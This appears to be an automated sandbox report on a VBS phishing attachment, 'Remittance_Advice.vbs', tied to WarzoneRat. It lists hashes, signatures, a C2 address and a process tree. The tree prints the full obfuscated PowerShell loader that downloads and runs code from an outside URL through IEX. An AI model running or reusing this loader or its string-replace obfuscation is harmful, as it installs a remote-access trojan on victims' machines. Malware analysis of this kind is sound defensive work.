Overview

overview

10

Static

static

Remittance_Advice.vbs

windows7_x64

10

Remittance_Advice.vbs

windows10_x64

10

Analysis

  • max time kernel
    299s
  • max time network
    283s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-07-2021 17:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Remittance_Advice.vbs

  • Size

    875B

  • MD5

    fc4a8faf57b167de212a02466d0f5435

  • SHA1

    8b83c8dad3b1168c37729b8c6551e7ac4d0071af

  • SHA256

    84199bedc07e09ccb967692a43de715611625dc247ceea48ea2f4a7109bc5287

  • SHA512

    855874d54ef794939a9c2da096dda06168f34cdb17500d762a4bbdaeb0e5ad687da86791150b83381e3617ff5ff88fb124c7b2d76c5f120b997d91206b7d18f0

Score
10/10
warzoneratinfostealerratsuricata

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.maan2u.com/a/ALL.txt

Extracted

Family

warzonerat

C2

192..3.146.165:3543

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • suricata: ET MALWARE PE EXE or DLL Windows file download Text
    suricata
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='https://www.maan2u.com/a/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:700
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
          PID:1560
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:2616

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/700-114-0x0000000000000000-mapping.dmp
        Download
      • memory/700-119-0x000002172BC10000-0x000002172BC11000-memory.dmp
        Filesize

        4KB

        Download
      • memory/700-123-0x00000217443D0000-0x00000217443D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/700-130-0x0000021744113000-0x0000021744115000-memory.dmp
        Filesize

        8KB

        Download
      • memory/700-129-0x0000021744110000-0x0000021744112000-memory.dmp
        Filesize

        8KB

        Download
      • memory/700-131-0x0000021744116000-0x0000021744118000-memory.dmp
        Filesize

        8KB

        Download
      • memory/700-152-0x00000217440E0000-0x00000217440F3000-memory.dmp
        Filesize

        76KB

        Download
      • memory/700-153-0x0000021744100000-0x0000021744102000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2616-156-0x0000000000400000-0x000000000055E000-memory.dmp
        Filesize

        1.4MB

        Download
      • memory/2616-157-0x0000000000405E28-mapping.dmp
        Download
      • memory/2616-173-0x0000000000400000-0x000000000055E000-memory.dmp
        Filesize

        1.4MB

        Download